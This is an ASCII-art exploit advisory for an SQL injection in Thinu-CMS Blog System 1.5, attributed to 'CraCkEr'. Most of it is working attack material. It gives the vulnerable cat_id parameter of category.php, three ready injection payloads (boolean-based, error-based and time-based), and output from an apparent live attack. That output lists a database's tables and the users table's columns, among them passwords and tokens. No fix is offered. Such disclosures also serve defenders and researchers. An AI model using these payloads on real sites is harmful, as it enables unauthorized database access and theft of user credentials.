┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.codester.com/items/40401/ │ │ Vendor : Thinu Tech │ │ Software : Thinu-CMS Blog System 1.5 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /category.php http://website/category.php?cat_id=[SQLI] GET parameter 'cat_id' is vulnerable to SQL Injection --- Parameter: cat_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat_id=3 AND 7897=7897 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: cat_id=3 OR (SELECT 8233 FROM(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(8233=8233,1))),0x716a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: cat_id=3 AND (SELECT 1981 FROM (SELECT(SLEEP(5)))lKbu) --- [+] Starting the Attack fetching current database current database: 'epiz_***50***_cms' fetching tables [10 tables] +----------------+ | ad_providers | | advertisements | | categories | | contacts | | navigation | | posts | | reports | | settings | | users | | users_online | +----------------+ fetching columns from Table 'users' [16 columns] +----------------+--------------+ | Column | Type | +----------------+--------------+ | about | text | | cover_image | text | | token | text | | user_email | varchar(255) | | user_facebook | text | | user_firstname | varchar(255) | | user_id | int(255) | | user_image | text | | user_instagram | text | | user_job | varchar(255) | | user_lastname | varchar(255) | | user_password | varchar(255) | | user_role | varchar(255) | | user_twitter | text | | user_website | text | | username | varchar(255) | +----------------+--------------+ [-] Done